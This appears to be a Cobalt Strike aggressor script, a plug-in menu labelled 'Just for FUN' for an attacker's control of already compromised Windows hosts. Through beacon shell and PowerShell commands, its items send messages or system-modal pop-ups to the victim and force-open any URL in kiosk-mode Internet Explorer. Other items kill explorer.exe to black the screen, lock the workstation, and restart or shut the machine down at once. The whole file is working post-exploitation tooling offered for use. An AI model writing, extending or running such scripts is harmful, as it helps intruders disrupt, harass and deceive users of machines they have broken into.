##############################
#                            #
#                            #
#                            #
#       XWAY.CN@panda        #
#                            #
#                            #
#                            #
##############################
sub Send {
        $username = replace(beacon_info($bid,"user"),' \*',"");
        $msg = $3['msg'];
        if(($username cmp "SYSTEM") == 0){
            show_error("Cannot send message with SYSTEM !");
            return;
        }
        bshell($bid,"msg $username \"$msg\"");
    }


    menu "Just for FUN"{
        item "Promote MsgBox" {
            prompt_text("Alert", "Helloooo!", lambda({
                bpowershell(@ids, 'Add-Type -AssemblyName Microsoft.VisualBasic; [Microsoft.VisualBasic.Interaction]::MsgBox("' . $1 . '", "OKOnly,MsgBoxSetForeground,SystemModal,Exclamation", "")' );
                blog(@ids,"Send message:$1 ");
            }, @ids => $1));
        }
        item "Open URL on IE" {
            prompt_text("Insert URL", "https://baidu.com", lambda({
                binput(@ids,"C:\\Progra~1\\Intern~1\\iexplore.exe -k $1");
                bshell(@ids, "C:\\Progra~1\\Intern~1\\iexplore.exe -k $1");
            }, @ids => $1));
        }

                item "Black Screen"{
                    bshell($1,"taskkill /F /IM explorer.exe");
                }
                item "Lock Screen"{
                    bshell($1,"rundll32.exe user32.dll,LockWorkStation");
                }
                item "Open Screen"{
                    brun($1, "explorer.exe");
                }
			    item "Restart" {
             prompt_text("ARE U SURE?", "", lambda({
            bshell(@ids, "shutdown -r -t 0");
        }, @ids => $1));
    }	
			    item "Shutdown" {
             prompt_text("ARE U SURE?", "", lambda({
            bshell(@ids, "shutdown -s -t 0");
        }, @ids => $1));
    }	

            }

